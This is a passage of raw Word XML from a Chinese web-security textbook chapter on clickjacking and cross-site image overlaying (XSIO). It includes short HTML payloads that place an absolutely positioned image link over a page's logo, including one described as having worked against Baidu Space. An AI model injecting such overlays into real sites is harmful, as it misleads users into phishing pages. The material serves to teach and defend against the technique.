        <w:t>某些点击是有意义的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>最终通过这一步步的操作，打开了用户的摄像头。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3424">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1385316</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>118384</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2774919" cy="2273998"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="21" name="image17.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="22" name="image17.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2774919" cy="2273998"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="158"/>
        <w:ind w:left="0" w:right="19" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>通过点击劫持打开了摄像头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>图片覆盖攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="169" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>点击劫持的本质是一种视觉欺骗。顺着这个思路，还有一些攻击方法也可以起到类似的作用，比如图片覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>一名叫 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sven.vetsch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的安全研究者最先提出了这种 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cross Site Image Overlaying </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击，简称</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSIO</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sven.vetsch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>通过调整图片的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>style </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>使得图片能够覆盖在他所指定的任意位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.853437pt;width:411.15pt;height:40pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3448;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;a </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId45">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>href="http://disenchant.ch"&gt;</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;img </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId46">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>src=http://disenchant.ch/po</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>w</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId46">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>ered.jpg</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:b/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>style=position:absolute;right:320px;top:90px;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/a&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>如下所示，覆盖前的页面是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:110.639999pt;margin-top:9.450957pt;width:215.3pt;height:80.650pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3472;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="2213,189" coordsize="4306,1613">
            <v:shape style="position:absolute;left:2346;top:210;width:4076;height:1549" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId49" o:title=""/>
            </v:shape>
            <v:line style="position:absolute" from="2218,189" to="2218,1802" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="6514,189" to="6514,1802" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="2222,1797" to="6509,1797" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="74"/>
        <w:ind w:left="0" w:right="19" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>覆盖前的页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>覆盖后的页面变成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:110.519997pt;margin-top:9.465pt;width:215.4pt;height:79.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3496;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="2210,189" coordsize="4308,1582">
            <v:shape style="position:absolute;left:2362;top:217;width:4000;height:1539" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId50" o:title=""/>
            </v:shape>
            <v:line style="position:absolute" from="2215,189" to="2215,1771" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="6514,189" to="6514,1771" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="2220,1766" to="6509,1766" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="74"/>
        <w:ind w:left="0" w:right="19" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>覆盖后的页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>页面里的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>logo </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>图片被覆盖了，并指向了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sven.vetsch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的网站。如果用户此时再去点击 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="202"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>图片，则会被链接到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sven.vetsch </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的网站。如果这是一个钓鱼网站的话，用户很可能会上当。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="603"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSIO </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>不同于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，它利用的是图片的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，或者能够控制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。如果应用没有限制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="456" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="604" w:right="1076" w:hanging="402"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:48.62999pt;width:411.15pt;height:40.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-69304" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/table&gt;&lt;a </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId51">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>href="http://www.ph4nt0m.org"&gt;</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
                    <w:ind w:left="28" w:right="3182" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;img </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId52">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>src="http://img.baidu.com/hi/img/portraitn.jpg"</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> style="position:absolute;left:123px;top:123px;"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/a&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="none"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>position </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>absolute </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的话，图片就可以覆盖到页面上的任意位置，形成点击劫持。百度空间也曾经出现过这个问题</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>，构造代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>一张头像图片被覆盖到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>logo </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>处：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3520">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1926880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>120086</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1840131" cy="1088136"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="23" name="image20.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="24" name="image20.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1840131" cy="1088136"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="146"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>一张头像图片被覆盖到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3544;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,11.42625pt" to="158.16pt,11.42625pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark6" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://hi.baidu.com/aullik5/blog/item/e031985175a02c6785352416.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="even" r:id="rId47"/>
          <w:headerReference w:type="default" r:id="rId48"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>点击此图片的话，会被链接到其他网站。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>图片还可以伪装得像一个正常的链接、按钮；或者在图片中构造一些文字，覆盖在关键的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>位置，就有可能完全改变页面中想表达的意思，在这种情况下，不需要用户点击，也能达到欺骗的目的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>比如，利用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSIO </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
